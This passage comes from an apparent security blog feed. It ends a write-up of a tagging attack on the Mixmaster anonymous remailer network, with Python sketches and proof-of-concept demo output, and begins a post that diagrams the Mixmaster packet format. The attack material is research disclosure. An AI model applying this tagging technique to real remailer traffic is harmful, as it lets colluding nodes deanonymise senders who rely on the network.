<span id="two_header1_enc_iv">Initialization Vector      <span class="rightblock">0x0A0A0A0A 0x0A0A0A</span><span class="leftblock">0A</span></span>
Timestamp                  <span class="rightblock">0x30303030 0x000506</span>
Message Digest             <span class="wholeblock">0x11112222 0x11112222</span> <span class="wholeblock redbg">0x11112222 0x11112222</span>
Padding                    <span class="wholeblock redbg">0x01020304 0x05060708</span> <span class="wholeblock redbg">0x01020304 0x05060708</span>
                           (Fill to 328 Bytes..)
</fieldset>
</pre>
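<p>The cascade in these figures can be checked with a little offset arithmetic. This is a sketch: the byte offsets and the one-byte shift between the outer and inner block grids are read off the diagrams above, not taken from the spec.</p>

```python
BLOCK = 8

def cbc_corruption(dirty, grid_start, block=BLOCK):
    """Plaintext offsets that come out wrong when the given ciphertext
    offsets are disturbed: the whole block containing each dirty byte,
    plus the matching byte of the following block."""
    out = set()
    for off in dirty:
        blk = grid_start + ((off - grid_start) // block) * block
        out.update(range(blk, blk + block))   # garbled block
        out.add(off + block)                  # flipped byte in the next block
    return out

# Offsets relative to the start of the Encrypted Header Part, per the figures:
TDES_KEY = set(range(16, 40))   # 24-byte Triple DES key
INNER_IV = set(range(57, 65))   # 8-byte Initialization Vector
DIGEST   = set(range(72, 88))   # 16-byte Message Digest; its last byte is 87

outer = cbc_corruption({87}, grid_start=-1)  # outer grid starts one byte early
inner = cbc_corruption(outer, grid_start=0)  # inner grid is field-aligned

assert not inner & TDES_KEY                  # the key survives
assert not inner & INNER_IV                  # the IV survives
assert inner & DIGEST == set(range(80, 88))  # second half of digest garbled
```

The corruption lands entirely in the digest's second half and the padding, which is exactly why that byte is the one to tamper with.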

<p>So after decryption, the third node will have a message digest that is half-valid and half-invalid.  If the attacker receives a message in that form, they are able to recognize it as a message they tagged in the first hop.  They are still able to decrypt the Mix Payload because, crucially, we did not cause any corruption to the Triple DES key or Initialization Vector. <span class="footnote">It is also possible there was a legitimate corruption during transit, but lower layer checksums make that improbable.</span></p>
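<p>The recognition step at the colluding exit node can be sketched like so. Per mixmaster-spec.txt the Message Digest is an MD5 over the header fields before it; the field contents below are stand-in bytes, not real packet data:</p>

```python
import hashlib

def check_tag(preceding_fields: bytes, included_digest: bytes) -> str:
    """Exit-node check: the digest covers the header fields before it,
    which the corruption never touches, so a recomputed digest whose
    first half matches a half-garbled included digest marks the message
    as one we tagged at the first hop."""
    actual = hashlib.md5(preceding_fields).digest()
    if included_digest == actual:
        return 'clean'
    if included_digest[:8] == actual[:8]:
        return 'tagged'          # the first CBC block of the digest survived
    return 'damaged in transit'

fields = b'packet-id|3des-key|type|message-id|iv|timestamp'  # stand-in bytes
good = hashlib.md5(fields).digest()
half_garbled = good[:8] + bytes(b ^ 0xFF for b in good[8:])

assert check_tag(fields, good) == 'clean'
assert check_tag(fields, half_garbled) == 'tagged'
```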

<p>If you'd like to follow this attack in greater detail, code demonstrating it is available on <a href="https://github.com/tomrittervg/mixmaster-tagging-attack">github</a>.  It makes heavy use of the unfinished Python Mixmaster implementation <a href="https://github.com/cryptodotis/mixfaster">Mixfaster</a>.  Here's what it looks like when you run it (output minified a tad):</p>

<pre>
$ ./demo.py
Client sends message with a Path of Node1,Node2,Node3
  by pure luck (or unluck) Nodes 1 and 3 are attacker-controlled
======================================================================
Received Message on Node 1, processing...
Message recieved by Node 1, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: 72f00ecf4f4e3af64d19772d4dd7d620
         PacketType: IntermediateHop (0)
         Timestamp:  Sun Oct 21 20:00:00 2012
         Remailer Address: node2@example.com
        ...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Performing Tagging Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Sending Message on to Node 2...
======================================================================
Received Message on Node 2, processing...
Message recieved by Node 2, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: 24a17d807994cffbe65fdc6ce13d3562
         PacketType: IntermediateHop (0)
         Timestamp:  Tue Oct 23 20:00:00 2012
         Remailer Address: node3@example.com
        ...
Sending Message on to Node 3...
======================================================================
Received Message on Node 3, processing...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Caught a Decoding Exception! Continuing Anyway...
Actual Digest   b496224032ec197aaa27ba3632e6f127
Included Digest b496224032ec197a925d5f463ffa7da8
                |______________||______________|
                     Matches       Corrupted
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Message recieved by Node 3, decrypted, and decoded:
        Packet Header ---------------------------
         Public Key Id: f3372c7effb5887858460b7ed2faab91
         PacketType: FinalHop (1)
         Timestamp:  Sun Oct 21 20:00:00 2012
        Packet Body -----------------------------
         Data Length       : 229
         Destination Fields: 1
            john@nytimes.com
         Header Fields     : 1
            Subject: Confidential Information
         User Data Type    : Plain (3)
         User Data:

           This is a sample mixmaster message demonstrating tagging attacks.
</pre>

<h3>Conclusion</h3>
 
<p>The flaw in Mixmaster is that there is no integrity protection of the Mix Headers or Payload as they cross nodes.  A node is able to verify that the Mix Header <em>it</em> processes has not been altered (at least up to the Padding) - but it cannot make the same statement about the <em>other</em> Mix Headers or the Payload.  So we modify a Header intended for Node 3 as the message leaves Node 1; Node 2 passes it on, unaware it's been tampered with; and Node 3 recognizes the tampering.</p>

<p><em style="font-size:small;">This blog post is licensed under <a href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a> and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project <a href="https://www.torproject.org/about/overview.html.en">here</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-packet_formats_1.html</guid>
		<title>Packet Formats</title>
		<pubDate>05 Jan 2013 23:47:00 EST</pubDate>
		<description><![CDATA[
<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p style="text-align:center"><em>While most of ritter.vg will function without javascript, this blog post is an exception.</em></p>

<script type="text/javascript" src="/resources/cryptodotis/post4/jquery-1.8.2.min.js"></script>  
<script type="text/javascript" src="/resources/cryptodotis/post4/jquery-ui-1.9.0.custom.min.js"></script>  
<script type="text/javascript" src="/resources/cryptodotis/post4/jquery.scrollto.js"></script>  
<link rel="stylesheet" href="/resources/cryptodotis/post4/jquery-ui.css" />
    
<style type="text/css">
#navfloat {
	position:fixed;
	top:150px;
	left: 0px;
	border-width: 1px 1px 1px 0px;
	border-color: black;
	border-style: solid;
	background-color:white;
    display: none;
}
#navfloat ul {
	margin-left:0px;
    padding-left:5px;
    padding-right:5px;
    margin-top: -10px;
}
#navfloat ul li{
    margin-top:15px;
    cursor: pointer;
    font-style: normal;
}
.disabledNav {
    cursor: default !important;
    opacity: 0.4 !important;
    filter: alpha(opacity=40) !important;
}

.packet {
    font-style: italic;
    font-variant: small-caps;
    font-family: monospace;
}
pre {
    padding-left:30px;
}
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p>A remailer's packet format is the format of the data it passes to the next remailer.  The packet format is somewhat independent of the remailer transport protocol itself - just as a letter is independent of how you receive it.  A courier can hand-deliver a letter to you, it can be dropped in your mailbox by a stranger, or the Postal Service can deliver it.  But once you've actually received it, you can open it, read it, and take action based on it.</p>

<p>Although packet formats are independent of the remailer transport protocol, most remailers do not process more than one format.  I initially wanted to create a single blog post covering all the major packet formats, but that proved to be extremely long, so it's going to be split up across a couple of blog posts.  This first one will cover the Mixmaster packet format, as used in the Mixmaster remailer network.</p>

<h2>Mixmaster Format</h2>

<p>The Mixmaster packet format is detailed in <a href="http://www.freehaven.net/anonbib/cache/mixmaster-spec.txt">mixmaster-spec.txt</a> and can be described as 20 <strong>Mix Headers</strong> followed by a <strong>Mix Payload</strong>.  The first Mix Header is encrypted to your public key - you can decrypt it and learn where to send the rest of the data.  If the message is a Final Hop, you will be able to decrypt the Payload, and send it to the final destination.</p>

<p>If the message is not a Final Hop - if it is an Intermediate Hop - you will find the address of the next remailer in the chain.  Before sending it on, you will decrypt all subsequent Headers (numbers 2 - 20) and the Payload - but you will not find any meaningful data, as they are encrypted multiple times, in an onion, to keys you don't know.  The following animated examples should demonstrate the layering:</p>
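<p>Before diving into the animations, the peel-one-layer flow can be reduced to a runnable toy.  An XOR keystream stands in for the RSA-wrapped session key and 3DES-CBC, and the headers are short strings rather than fixed-size blocks - all of that is a simplification, not the real format:</p>

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    # Toy keystream standing in for one 3DES-CBC layer (illustration only).
    out, ctr = b'', 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, 'big')).digest()
        ctr += 1
    return out[:n]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

hop_keys = [b'k1', b'k2', b'k3']     # per-hop keys chosen by the sender
headers  = [b'to: hop2', b'to: hop3', b'final: john@example.com']
payload  = b'the actual message'

# The sender wraps header i under the keys of every hop before hop i,
# and wraps the payload under all of them.
wrapped = list(headers)
for i in range(len(wrapped)):
    for k in hop_keys[:i]:
        wrapped[i] = xor(wrapped[i], keystream(k, len(wrapped[i])))
for k in hop_keys:
    payload = xor(payload, keystream(k, len(payload)))

# Each hop reads only its own header, then strips its layer from
# everything that remains before forwarding.
for i, k in enumerate(hop_keys):
    mine, wrapped = wrapped[0], wrapped[1:]
    assert mine == headers[i]        # meaningful only at the right hop
    wrapped = [xor(h, keystream(k, len(h))) for h in wrapped]
    payload = xor(payload, keystream(k, len(payload)))

assert payload == b'the actual message'
```

In the real format every header is a fixed 512 bytes and a departing hop appends random data in place of the header it consumed, so a message's size and shape don't reveal its position in the chain.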

<div id="mixmaster_accordian">
<!-- ========================================================================================= -->
<!-- ========================================================================================= -->
<h3>Mixmaster Final Message, As Seen by the Final Hop</h3>
<div>
<script type="text/javascript">
var generalDuration = 3000;

var animationSequence = [];
var animationIndex = 0;
var animationRunning = false;

function animationComplete() {
	animationRunning = false;
	
    console.log("Animation Complete");
    
    $('#navfloat').animate({
            left: '0',
        }, {
            duration: 500
        });
    
    if(animationIndex == animationSequence.length - 1)
	{
        $('#navprev').removeClass('disabledNav');
        $('#navclose').removeClass('disabledNav');
    }
    else
    {
        $('#navfloat ul li').removeClass('disabledNav');
    }
}
function animate_prev() {
	if(animationIndex == 0) return;
	if(animationRunning) return;
	
	animationIndex--;
	animationSequence[animationIndex](true);
}
function animate_next() {
	if(animationIndex == animationSequence.length - 1) return;
	if(animationRunning) return;
	
	animationIndex++;
	animationRunning = true;
    $('#navfloat ul li').addClass('disabledNav');
    $('#navfloat').animate({
            left: '-250',
        }, {
            duration: 500
        });
	animationSequence[animationIndex]();
}
function animate_close() {
	animationSequence[0]();
	animationIndex = 0;
	animationSequence = [];
	animationRunning = false;
    $('#navfloat').css('display', 'none');
}
function animationSetup() {
    animationIndex = 1;
    animationRunning = false;
    $('#arrow').css('display', 'none');
	
    $('#navfloat').css('display', 'block');
    $('#navfloat ul li').removeClass('disabledNav');
    $('#navprev').addClass('disabledNav');
}
function scrollToArrow() {
    $.scrollTo($('#arrow'), 500, {axis:'y', offset:-75});
}
</script>
<script type="text/javascript">
function animateOne_reset()
{
	$('#btn_animateone').css('visibility', '');
    $('#one_header1_enc').css({'border-color' : '', 'background':'', 'color':''});
    $('#one_header1_enc legend').css({'color':'black'});
    
    $('#one_header1_enc_tdes, #one_header1_enc_iv, #one_header1_iv, #one_header1_decryptsto, #one_header1_rsasessionkey').css('color', '');
    $('#one_header1_decryptsto').css({'visibility': ''});
    
    $('#one_payload').css({'border-color' : '', 'background':'', 'color':''});
    $('#one_payload legend').css({'color':''});
	
	$('#arrow').css('display', 'none');
	animationRunning = false;
}
function animateOne_setup()
{
	animationSequence = animateOne;
    $('#btn_animateone').css('visibility', 'hidden');
    $('#one_header1_enc').css({'border-color' : 'red', 'background':'pink', 'color':'pink'});
    $('#one_header1_enc legend').css({'color':'black'});
    
    $('#one_header1_enc_tdes, #one_header1_enc_iv, #one_header1_iv, #one_header1_decryptsto, #one_header1_rsasessionkey').css('color', '');
    $('#one_header1_decryptsto').css({'visibility': 'hidden'});
    
    $('#one_payload').css({'border-color' : 'blue', 'background':'lightblue', 'color':'lightblue'});
    $('#one_payload legend').css({'color':'black'});
	
	animationSetup();
}
function animateOne_1(backwards)
{
    $('#arrow').css('display', 'table');
    $('#arrow span').text('This is the Mix Message.  The hidden parts are encrypted.');
    $('#arrow').position({
        of:$('#one legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
		
	$('#one_header1_rsasessionkey').css('color', '');
	animationComplete();
}
function animateOne_2(backwards)
{
    $('#arrow span').html('First, Decrypt the Session Key <br />with your RSA Private Key');
    $('#arrow').position({
        of:$('#one_header1_rsasessionkey'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
    $('#one_header1_rsasessionkey').animate({
            color: '#bca510',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: function() { $('#one_header1_decryptsto').css('visibility', 'visible'); animationComplete(); }
        });
	$('#one_header1_decryptsto').css('visibility', 'hidden');
	$('#one_header1_decryptsto, #one_header1_iv').css('color', '');
}
function animateOne_3(backwards) 
{
    $('#arrow span').text('Use the Session Key and IV...')
    $('#arrow').position({
        of:$('#one_header1_decryptsto'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
    
    $('#one_header1_decryptsto, #one_header1_iv').animate({
            color: 'red',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#one_header1_enc').css({'color':'pink'});
}
function animateOne_4(backwards)
{
    $('#arrow span').text('To Decrypt the Encrypted Header')
    $('#arrow').position({
        of:$('#one_header1_enc legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
    $('#one_header1_enc').animate({
            color: 'black',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#one_header1_enc_tdes, #one_header1_enc_iv').css('color','');
}
function animateOne_5(backwards)
{
    $('#arrow span').text('Use the Triple DES Key and IV...')
    $('#arrow').position({
        of:$('#one_header1_enc_tdes'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
    $('#one_header1_enc_tdes, #one_header1_enc_iv').animate({
            color: 'blue',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#one_payload').css({'color': 'lightblue'});
	$('#btn_animateone').css('visibility', 'hidden');
}
function animateOne_6(backwards)
{
    $('#arrow span').text('To Decrypt the Payload ');
    $('#arrow').position({
        of:$('#one_payload legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset: 10}).effect('bounce');
    scrollToArrow();
    $('#one_payload').animate({
            color: 'black',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
    $('#btn_animateone').css('visibility', '');
}

var animateOne = [animateOne_reset, animateOne_setup, animateOne_1, animateOne_2, animateOne_3, animateOne_4, animateOne_5, animateOne_6];
</script>
<input type="button" onclick="animateOne_setup();" id="btn_animateone" value="Animate"/>

<pre><fieldset id="one"><legend>Mixmaster Final Message, As Seen by the Final Hop</legend><fieldset  id="one_headers"><legend>Mix Headers</legend><fieldset id="one_header1"><legend>Mix Header 1</legend>Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
<span id="one_header1_rsasessionkey">RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678</span>     
                           <span id="one_header1_decryptsto">Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC</span>
<span id="one_header1_iv">Initialization Vector      0x09090909 0x09090909</span>
<fieldset id="one_header1_enc"><legend>Encrypted Header Part</legend>
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
<span id="one_header1_enc_tdes">TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45</span>
Packet Type Identifier     0x01
Packet Information
Message ID (16 bytes)      0x31537597 0x31537597 0x31537597 0x31537597
<span id="one_header1_enc_iv">Initialization Vector      0x0A0A0A0A 0x0A0A0A0A</span>
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
</fieldset></fieldset><fieldset id="one_headers2"><legend>Mix Headers 2-20</legend>Random Data (512 bytes)    0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....
</fieldset></fieldset><fieldset id="one_payload"><legend>Mix Payload</legend>Length                     0x12 0x10 0x00 0x00
# of Destination Fields    0x01
Destination Fields         john@example.com 0x00 0x00 0x00  (Padded to 80 bytes)
# of Header Fields         0x01
Header Fields              Subject: Event Details 0x00 0x00 (Padded to 80 bytes)
User Data Section          
Message                    Hey John, 
                           
                           We're planning on starting at 10 PM, so if you could
                           show up at 9:00 to help set up, we'd appreciate it.
                           
                           Thanks,
                           Staff
                           0x00 0x00 0x00 0x00 0x00 (padded to 10236 bytes)
</fieldset></fieldset></pre>
</div>
<!-- ========================================================================================= -->
<!-- ========================================================================================= -->
<h3>Mixmaster Intermediate Message, As Seen by an Intermediate Hop</h3>
<div>
<!-- ========================================================================================= -->
<!-- ========================================================================================= -->
<script type="text/javascript">
function animateTwo_reset()
{
    $('#btn_animatetwo').css('visibility', '');
    
    $('#two_header1_decryptsto').css({'visibility':''});
    $('#two_header1_enc').css({'border-color':'', 'background':'', 'color':''});
    $('#two_header1_enc legend').css('color', '');
    
    $('#two_header2, #two_header2_enc, #two_headers3, #two_payload').css({'border-color':'', 'background':'', 'color':''});
    $('#two_header2 legend, #two_headers3 legend, #two_payload legend').css('color', '');
    $('#two_header1_rsasessionkey, #two_header1_enc_iv, #two_header1_enc_tdes, #two_header1_iv, #two_header1_decryptsto, #two_payload_inner').css('color', '');
    
    $('#two_header2_enc').css('visibility', '');
    $('#two_header2_enc, #two_payload_inner').css({'background-color':''});

    $('#two_payload_inner').css('visibility', '');
	
	$('#arrow').css('display', 'none');
	animationRunning = false;
}
function animateTwo_setup()
{
    animationSequence = animateTwo;
	$('#btn_animatetwo').css('visibility', 'hidden');
    
    $('#two_header1_decryptsto').css({'visibility':'hidden'});
    $('#two_header1_enc').css({'border-color':'red', 'background':'pink', 'color':'pink'});
    $('#two_header1_enc legend').css('color', 'black');
    
    $('#two_header2, #two_headers3, #two_payload').css({'border-color':'blue', 'background':'lightblue', 'color':'lightblue'});
    $('#two_header2 legend, #two_headers3 legend, #two_payload legend').css('color', 'black');
    
    $('#two_header2_enc').css('visibility', 'hidden');
    $('#two_payload_inner').css('visibility', 'hidden');
    
    animationSetup();
}
function animateTwo_1(backwards)
{
	$('#arrow').css('display', 'table');
    $('#arrow span').text('This is the Mix Message.  The hidden parts are encrypted.');
    $('#arrow').position({
        of:$('#two legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
	$('#two_header1_rsasessionkey').css('color', '');
	animationComplete();
}
function animateTwo_2(backwards)
{
    $('#arrow span').text('First, Decrypt the Session Key with your RSA Private Key');
    $('#arrow').position({
        of:$('#two_header1_rsasessionkey'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_header1_rsasessionkey').animate({
            color: '#bca510',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: function() { $('#two_header1_decryptsto').css('visibility', ''); animationComplete(); }
        });
	$('#two_header1_decryptsto, #two_header1_iv').css('color', '');
	$('#two_header1_decryptsto').css('visibility', 'hidden');
}
function animateTwo_3(backwards) 
{
    $('#arrow span').text('Use the Session Key and IV...')
    $('#arrow').position({
        of:$('#two_header1_decryptsto'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_header1_decryptsto').css('visibility', '');
    $('#two_header1_decryptsto, #two_header1_iv').animate({
            color: 'red',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#two_header1_enc').css('color', 'pink');
}
function animateTwo_4(backwards)
{
    $('#arrow span').text('To Decrypt the Encrypted Header')
    $('#arrow').position({
        of:$('#two_header1_enc legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_header1_enc').animate({
            color: 'black',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#two_header1_enc_tdes, #two_header1_enc_iv').css('color', '');
}
function animateTwo_5(backwards)
{
    $('#arrow span').text('Use the Triple DES Key and IVs...')
    $('#arrow').position({
        of:$('#two_header1_enc_tdes'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_header1_enc_tdes, #two_header1_enc_iv').animate({
            color: 'blue',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#two_header2_enc').css({'visibility':'hidden'});
	$('#two_header2_enc').css({'background-color':''});
	$('#two_header2').css('color', 'lightblue');
}
function animateTwo_6(backwards)
{
    $('#arrow span').text('To Decrypt the Next Mix Header (using IV1)')
    $('#arrow').position({
        of:$('#two_header2 legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_header2_enc').css({'visibility':'visible'});
    $('#two_header2_enc').animate({
            'background-color':'yellow'
        }, {
            duration: backwards ? 1 : generalDuration,
        });
    $('#two_header2').animate({
            color: 'black',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#two_headers3').css('color', 'lightblue');
}
function animateTwo_7(backwards)
{
    $('#arrow span').text('To Decrypt each of the Next Mix Headers (using IVs 2-19)')
    $('#arrow').position({
        of:$('#two_headers3 legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_headers3').animate({
            color: 'black',
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
	$('#two_payload_inner').css({
		'visibility':'hidden',
		'background-color':'',
		'color':'lightblue'
	});
}
function animateTwo_8(backwards)
{
    $('#arrow span').text('And finally to Decrypt the Payload (using IV 19)')
    $('#arrow').position({
        of:$('#two_payload legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#two_payload_inner').css({'visibility':''});
    $('#two_payload_inner').animate({
            'background-color':'purple',
            'color':'white'
        }, {
            duration: backwards ? 1 : generalDuration,
            complete: animationComplete
        });
}
function animateTwo_9(backwards)
{
    $('#arrow span').text('But we can\'t decrypt this Payload...')
    $('#arrow').position({
        of:$('#two_payload_inner span'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
	animationComplete();
}
function animateTwo_10(backwards)
{
    $('#arrow span').text('Or this encrypted header part...')
    $('#arrow').position({
        of:$('#two_header2_enc span'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
	animationComplete();
}
function animateTwo_11(backwards)
{
    $('#arrow span').text('Or even make sense of the subsequent Mix Headers...')
    $('#arrow').position({
        of:$('#two_headers3 legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
	animationComplete();
}
function animateTwo_12(backwards)
{
    $('#arrow span').html('The Key to decrypt the yellow <br />header part is encrypted to a <br />Public Key we don\'t control')
    $('#arrow').position({
        of:$('#two_header2_rsasessionkey'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
	animationComplete();
}
function animateTwo_13(backwards)
{
    $('#arrow span').html('The key to decrypt the public parts of the next header <br />is inside the yellow header part.')
    $('#arrow').position({
        of:$('#two_headers3 legend'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#btn_animatetwo').css('visibility', 'hidden');
	animationComplete();
}
function animateTwo_14(backwards)
{
    $('#arrow span').html('And the key to decrypt the purple payload is either inside the<br />yellow header part, or in a subsequent mix header (we can\'t be sure).');
    $('#arrow').position({
        of:$('#two_payload_inner span'),
        my:'left center',
        at:'right center', 
        'collision':'none',
        offset:10}).effect('bounce');
    scrollToArrow();
    $('#btn_animatetwo').css('visibility', '');
	animationComplete();
}
var animateTwo = [animateTwo_reset, animateTwo_setup, animateTwo_1, animateTwo_2, animateTwo_3, animateTwo_4, animateTwo_5, animateTwo_6, animateTwo_7, animateTwo_8, animateTwo_9, animateTwo_10, animateTwo_11, animateTwo_12, animateTwo_13, animateTwo_14];
</script>
<input type="button" onclick="animateTwo_setup();" id="btn_animatetwo" value="Animate"/>

<pre>
<fieldset id="two"><legend>Mixmaster Intermediate Message, As Seen by an Intermediate Hop</legend>
<fieldset id="two_headers"><legend>Mix Headers</legend>
<fieldset id="two_header1"><legend>Mix Header 1</legend>
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
<span id="two_header1_rsasessionkey">RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678</span>     
                           <span id="two_header1_decryptsto">Decrypts To: 0xDABCDABC 0xDABCDABC 0xDABCDABC</span>
<span id="two_header1_iv">Initialization Vector      0x09090909 0x09090909</span>
<fieldset id="two_header1_enc"><legend>Encrypted Header Part</legend>
Packet ID (16 bytes)       0x87214365 0x87214365 0x87214365 0x87214365
<span id="two_header1_enc_tdes">TDES Key  (24 bytes)       0xFE45FE45 0xFE45FE45 
                           0xFE45FE45 0xFE45FE45
                           0xFE45FE45 0xFE45FE45</span>
Packet Type Identifier     0x00
Packet Information
<span id="two_header1_enc_iv">Initialization Vector1     0x0A0A0A0A 0x0A0A0A0A
Initialization Vector2     0x0B0A0A0A 0x0B0A0A0A
Initialization Vector3     0x0C0A0A0A 0x0C0A0A0A
Initialization Vector4     0x0D0A0A0A 0x0D0A0A0A
Initialization Vector5     0x0E0A0A0A 0x0E0A0A0A
Initialization Vector6     0x0F0A0A0A 0x0F0A0A0A
Initialization Vector7     0x1A0A0A0A 0x1A0A0A0A
Initialization Vector8     0x1B0A0A0A 0x1B0A0A0A
Initialization Vector9     0x1C0A0A0A 0x1C0A0A0A
Initialization Vector10    0x1D0A0A0A 0x1D0A0A0A
Initialization Vector11    0x1F0A0A0A 0x1F0A0A0A
Initialization Vector12    0x2A0A0A0A 0x2A0A0A0A
Initialization Vector13    0x2B0A0A0A 0x2B0A0A0A
Initialization Vector14    0x2C0A0A0A 0x2C0A0A0A
Initialization Vector15    0x2D0A0A0A 0x2D0A0A0A
Initialization Vector16    0x2E0A0A0A 0x2E0A0A0A
Initialization Vector17    0x2F0A0A0A 0x2F0A0A0A
Initialization Vector18    0x3A0A0A0A 0x3A0A0A0A
Initialization Vector19    0x3B0A0A0A 0x3B0A0A0A</span>
Remailer Address           exitremailer@exam.com 0x00 0x00 (Padded to 80 bytes)
Timestamp                  0x30303030 0x000506
Message Digest             0x11112222 0x11112222 0x11112222 0x11112222
Padding                    0x01020304 0x05060708 (Fill to 328 Bytes..)
</fieldset>
</fieldset>
<fieldset id="two_header2"><legend>Mix Header 2</legend>
Public Key ID (16 bytes)   0xABCDABCD 0xABCDABCD 0xABCDABCD 0xABCDABCD
Length of RSA Enc-ed Data  0xF0
<span id="two_header2_rsasessionkey">RSA Encrypted Session Key  0x12345678 0x12345678 0x12345678 0x12345678
         (128 bytes)       0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678

                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678
                           0x12345678 0x12345678 0x12345678 0x12345678</span>     
Initialization Vector      0x09090909 0x09090909
<fieldset id="two_header2_enc"><legend>Encrypted Header Part</legend><span>Indecipherable Data</span></fieldset>
</fieldset>
</fieldset>
<fieldset id="two_headers3"><legend>Mix Headers 3-20</legend>Indecipherable Data        0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE 0xEEEEEEEE
                           ....
</fieldset>
